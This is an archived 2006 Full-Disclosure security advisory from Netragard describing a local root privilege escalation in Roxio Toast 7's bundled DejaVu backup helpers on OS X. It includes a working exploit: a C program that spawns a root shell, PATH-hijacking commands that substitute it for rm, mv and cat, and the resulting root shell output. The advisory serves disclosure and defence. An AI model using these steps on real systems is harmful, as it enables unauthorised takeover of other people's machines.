lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <44E4D8CF.7040808@netragard.com>
Date: Thu, 17 Aug 2006 16:59:59 -0400
From: Netragard Security Advisories <advisories@...ragard.com>
To: Untitled <full-disclosure@...ts.grok.org.uk>
Subject: NETRAGARD-20060624 SECURITY ADVISORY] [ROXIO
 TOAST 7 TITANIUM - LOCAL ROOT COMPROMISE ] 

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
 
**********************************************************************
Netragard, L.L.C.   --    Vulnerability Research and Exploitation Team

                         www.netragard.com                

[Advisory Information]
- ----------------------------------------------------------------------
Contact:               : Adriel T. Desautels
Advisory ID            : NETRAGARD-20060624
Product Name           : Roxio Toast
Product Version        : 7 Titanium
Vendor Name            : Roxio
Type of Vulnerability  : Local Root Compromise
Effort                 : Easy
Operating System       : OSX
Other                  : Insecure usage of $PATH



[Product Description]
- ----------------------------------------------------------------------
"Toast 7 is the best way to save, share and enjoy a lifetime of digital
music, movies and photos on CD and DVD. Burn large files across
multiple discs; compress and copy DVD movies; add over 50 hours of
music to an audio DVD with on-screen TV menus, shuffle play, and rich
Dolby Digital sound; burn DivX files into DVDs. Do it all with the
fastest and most reliable burning software for the Mac OS - Toast."

- --http://www.roxio.com--



[Technical Summary]
- ----------------------------------------------------------------------
Doing a default installation of Roxio Toast 7 Titanium also installs
DejaVu which is used for backups. DejaVu uses a control panel helper
application which makes isecure system() calls. More specifically,
an attacker can exploit these system() calls using the user controlled
environment variable named $PATH and gain root access to the system.



[Technical Details]
- ----------------------------------------------------------------------

This was tested using a configured version of Roxio Toast 7 Titanium.


Roxio 7 Toast contains locally exploitable vulnerabilities due to
insecure system() by calls by suid binaries which use the users $PATH
environment variable.

The following shows the DejaVu suid binaries:

netragard-test-1$ find . -perm -4000
./DejaVu.prefPane/Contents/Resources/abort_backup
./DejaVu.prefPane/Contents/Resources/archive_table
./DejaVu.prefPane/Contents/Resources/install_crontab
./DejaVu.prefPane/Contents/Resources/install_scripts
./DejaVu.prefPane/Contents/Resources/manual_backup
./DejaVu.prefPane/Contents/Resources/remove_scripts


1-Exploitation is trivial. A user must first create small program such
as the one demonstrated by simple.c below.

netragard-test-1$ cat > simple.c

main()
{
    seteuid(0);
    setuid(0);
    setegid(0);
    setgid(0);
    system("/bin/sh -i");
}

2-Once the user has created the program, the user must comple the
program, copy the program to replace rm, mv and cat, and insert it
into the $PATH variable.

netragard-test-1$cc -o chmod simple.c
netragard-test-1$cp chmod /tmp/rm
netragard-test-1$cp chmod /tmp/mv
netragard-test-1$cp chmod /tmp/cat
netragard-test-1$export PATH=/tmp/:$PATH

3-Once the user has finished with step 2, the user must then launch
the "System Preferences" control pannel.

netragard-test-1$/Applications/System\
Preferences.app/Contents/MacOS/System\ Preferences

4-After the user has launched the Systems Preferences helper
application, a GUI window should display. From that window click on
"Deja Vu" located in the "other" section. From there create a manual
backup and then click the backup button. At that point you should be
presented with a root shell prompt:

sh: no job control in this shell
sh-2.05b# id

uid=0(root) gid=0(wheel) groups=0(wheel), 81(appserveradm),
79(appserverusr), 80(admin)



[Proof Of Concept]
- ----------------------------------------------------------------------
Successful Created and Functional



[Vendor Status]
- ----------------------------------------------------------------------
Vendor contacted and notified of the issue.

Vendor Comment:
Deja Vu, the affected component of Roxio Toast, is bundled into Roxio
Toast and is third party software. Deva Vu is authored by Propaganda
Productions and not Sonic.


[About Netragard]
- ----------------------------------------------------------------------
Netragard offers specialized application and network security services
which enable its clients to take a proactive security stance. Each of
our services is driven by security professionals who specialize in
specific areas of Information Security. This specialized focus
differentiates Netragard from the competition by enabling Netragard
to produce deliverables which are the product of skilled security
professionals and not the product of automated tools and scripts.

   
   [ For more information please visit http://www.netragard.com ]


[Disclaimer]
- ---------------------http://www.netragard.com-------------------------
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to
help the I.T. community protect themselves against a potentially
dangerous security hole. This advisory is not an attempt to solicit
business.

- --


Regards,
    Netragard Vulnerability Research Team
    advisories at netragard dot com
    http://www.netragard.com
    -------------------------
    "We make I.T. Secure"
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (MingW32)
 
iD8DBQFE5NjPNn0v/IJLeTQRAlWRAKCXHq1wgbdJBcAupZQK8IOSDvRGagCg21tX
DFni9FJEXsz1LY/syMSFt1k=
=1Iqk
-----END PGP SIGNATURE-----




BullGuard Anti-virus has scanned this e-mail and found it clean.
Try BullGuard for free: www.bullguard.com


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ